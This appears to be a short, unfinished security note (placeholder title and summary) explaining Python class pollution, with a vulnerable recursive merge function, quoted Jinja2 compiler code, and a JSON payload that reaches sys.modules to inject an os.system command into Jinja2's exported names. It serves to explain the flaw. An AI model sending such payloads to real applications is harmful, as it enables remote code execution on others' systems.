Title here
Summary here
Class pollution is a security flaw that enables an attacker to alter class variables. Depending on the available gadgets, this could result in file access or even remote code execution.
Pydash set_
and set_with
functions or custom merge
function:
def merge(source, destination):
for key, value in source.items():
if hasattr(destination, "get"):
if destination.get(key) and type(value) == dict:
merge(value, destination.get(key))
else:
destination[key] = value
elif hasattr(destination, key) and type(value) == dict:
merge(value, getattr(destination, key))
else:
setattr(destination, key, value)
def visit_Template(
self, node: nodes.Template, frame: t.Optional[Frame] = None
) -> None:
assert frame is None, "no root frame allowed"
eval_ctx = EvalContext(self.environment, self.name)
from .runtime import exported, async_exported
if self.environment.is_async:
exported_names = sorted(exported + async_exported)
else:
exported_names = sorted(exported)
self.writeline("from jinja2.runtime import " + ", ".join(exported_names))
Payload:
{"__init__":{"__globals__":{"__loader__": {"__init__":{"__globals__":{"sys":{"modules": {"jinja2":{"runtime":{"exported":["*;__import__('os').system('sleep 7');#"]}}}}}}}}}}